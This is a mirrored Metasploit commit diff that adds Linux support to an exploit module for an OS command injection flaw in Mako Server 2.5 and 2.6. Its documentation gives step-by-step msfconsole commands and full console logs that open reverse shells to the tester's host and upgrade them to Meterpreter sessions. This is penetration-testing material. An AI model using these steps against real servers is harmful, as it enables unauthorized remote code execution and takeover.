infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #9197, Cleanup Mako Server exploit

MS-2855/keylogger-mettle-extension 4.16.17
Adam Cammack 2017-11-15 15:01:31 -06:00
parent f357efd97c 4219959c6d
commit c740f4369c
No known key found for this signature in database
GPG Key ID: C9378BA088092D66
2 changed files with 108 additions and 20 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

118
documentation/modules/exploit/windows/http/makoserver_cmd_exec.md → documentation/modules/exploit/multi/http/makoserver_cmd_exec.md
View File

@ -1,6 +1,6 @@
## Description ## Description
This module exploits a vulnerability found in Mako Server v2.5. This module exploits a vulnerability found in Mako Server v2.5, 2.6.
It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp. It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp.
Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391 Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391
@ -9,33 +9,48 @@
[Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications. [Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications.
This module has been verified against the following Mako Server versions for Windows XP SP3 and Windows 7 SP1 (x86/x64): This module has been verified against the following Mako Server versions for Windows XP SP3, Windows 7 SP1 and Linux Ubuntu 16.04 LTS:
- v2.5 - v2.5
- v2.6
Links: Links:
- [Windows installer](https://makoserver.net/download/mako.windows.x86.exe) - [Windows x86 installer](https://makoserver.net/download/mako.windows.x86.exe)
- [Windows download page](https://makoserver.net/download/windows) - [Windows download page](https://makoserver.net/download/windows)
- [Documentation](https://makoserver.net/documentation/manual/) - [Linux x64 installer](https://makoserver.net/download/mako.linux-x64.tar.gz)
- [Linux download page](https://makoserver.net/download/linux-x86)
- [Documentation](https://makoserver.net/download/manual)
## References for vulnerability ## References for vulnerability
- https://blogs.securiteam.com/index.php/archives/3391 - https://blogs.securiteam.com/index.php/archives/3391
- https://www.exploit-db.com/exploits/42683 - https://www.exploit-db.com/exploits/42683
## Verification Steps ## Verification Steps for Windows
1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work) 1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work)
2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop 2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop
3. Start msfconsole on host 4. Start msfconsole on host
4. Do: ```use exploit/windows/http/makoserver_cmd_exec``` 5. Do: ```use exploit/multi/http/makoserver_cmd_exec```
5. Do: ```set RHOST <IP address of target system>``` 6. Do: ```set RHOST <IP address of target system>```
6. Do: ```set PAYLOAD cmd/windows/reverse_powershell``` 7. Do: ```set PAYLOAD cmd/windows/reverse_powershell```
7. Do: ```set LHOST <IP address of host system>``` 8. Do: ```set LHOST <IP address of host system>```
8. Do: ```exploit``` 9. Do: ```exploit```
9. You should get a Windows command shell 10. You should get a Windows command shell
## Verification Steps for Linux
1. Extract the "mako.linux-x64.tar.gz" on a Linux Ubuntu 16.04 LTS (x64) target (with Python for this example to work)
2. From inside the extracted folder, do ```./rundemo.sh```
4. Start msfconsole on host
5. Do: ```use exploit/multi/http/makoserver_cmd_exec```
6. Do: ```set RHOST <IP address of target system>```
7. Do: ```set PAYLOAD cmd/unix/python_reverse```
8. Do: ```set LHOST <IP address of host system>```
9. Do: ```exploit```
10. You should get a Linux command shell (may need to wait ~30 seconds)
## Example Output ## Example Output
``` ```
msf > use exploit/windows/http/makoserver_cmd_exec msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
RHOST => 10.10.10.3 RHOST => 10.10.10.3
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
@ -57,7 +72,7 @@ C:\Users\Smith\Downloads\MakoServer>
## Example Verbose Output ## Example Verbose Output
``` ```
msf > use exploit/windows/http/makoserver_cmd_exec msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3
RHOST => 10.10.10.3 RHOST => 10.10.10.3
msf exploit(makoserver_cmd_exec) > set VERBOSE true msf exploit(makoserver_cmd_exec) > set VERBOSE true
@ -94,7 +109,7 @@ C:\Users\Smith\Downloads\MakoServer>
A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session: A typical scenario would be to obtain a Windows command shell and then upgrade to a Meterpreter session:
``` ```
msf > use exploit/windows/http/makoserver_cmd_exec msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2 msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
RHOST => 10.10.10.2 RHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell
@ -161,3 +176,76 @@ C:\Users\Smith\Downloads\MakoServer>
Logged On Users : 2 Logged On Users : 2
Meterpreter : x86/windows Meterpreter : x86/windows
``` ```
### Targeting Linux Ubuntu 16.04 LTS x64 running Mako Server v2.5
A typical scenario would be to obtain a Linux command shell and then upgrade to a Meterpreter session:
```
msf > use exploit/multi/http/makoserver_cmd_exec
msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.2
RHOST => 10.10.10.2
msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.4
LHOST => 10.10.10.4
msf exploit(makoserver_cmd_exec) > check
[*] 10.10.10.2:80 The target appears to be vulnerable.
msf exploit(makoserver_cmd_exec) > exploit
[*] Started reverse TCP handler on 10.10.10.4:4444
[*] Sending payload to target...
[*] Command shell session 1 opened (10.10.10.4:4444 -> 10.10.10.2:57888) at 2017-11-10 15:52:33 -0500
ls
LICENSE.txt
mako
mako.zip
README.txt
rundemo.sh
tutorial
^Z
Background session 1? [y/N] y
msf exploit(makoserver_cmd_exec) > use multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2)
msf post(shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf post(shell_to_meterpreter) > set LPORT 8080
LPORT => 8080
msf post(shell_to_meterpreter) > exploit
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.10.10.4:8080
[*] Sending stage (847604 bytes) to 10.10.10.2
[*] Meterpreter session 2 opened (10.10.10.4:8080 -> 10.10.10.2:60448) at 2017-11-10 15:54:38 -0500
[*] Command stager progress: 100.00% (736/736 bytes)
[*] Post module execution completed
msf post(shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.10.10.4:4444 -> 10.10.10.2:57888 (10.10.10.2)
2 meterpreter x86/linux uid=1000, gid=1000, euid=1000, egid=1000 @ 10.10.10.2 10.10.10.4:8080 -> 10.10.10.2:60448 (10.10.10.2)
msf post(shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer : 10.10.10.2
OS : Ubuntu 16.04 (Linux 4.10.0-35-generic)
Architecture : x64
Meterpreter : x86/linux
```

10
modules/exploits/windows/http/makoserver_cmd_exec.rb → modules/exploits/multi/http/makoserver_cmd_exec.rb
View File

@ -4,15 +4,15 @@
## ##
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
'Name' => 'Mako Server v2.5 OS Command Injection RCE', 'Name' => 'Mako Server v2.5, 2.6 OS Command Injection RCE',
'Description' => %q{ 'Description' => %q{
This module exploits a vulnerability found in Mako Server v2.5. This module exploits a vulnerability found in Mako Server v2.5, 2.6.
It's possible to inject arbitrary OS commands in the Mako Server It's possible to inject arbitrary OS commands in the Mako Server
tutorial page through a PUT request to save.lsp. tutorial page through a PUT request to save.lsp.
@ -31,10 +31,10 @@ class MetasploitModule < Msf::Exploit::Remote
['URL', 'https://blogs.securiteam.com/index.php/archives/3391'] ['URL', 'https://blogs.securiteam.com/index.php/archives/3391']
], ],
'Arch' => ARCH_CMD, 'Arch' => ARCH_CMD,
'Platform' => 'win', 'Platform' => %w[win unix],
'Targets' => 'Targets' =>
[ [
['Mako Server v2.5 - Windows x86/x64', { }] ['Mako Server v2.5, 2.6', {}]
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'Privileged' => false, 'Privileged' => false,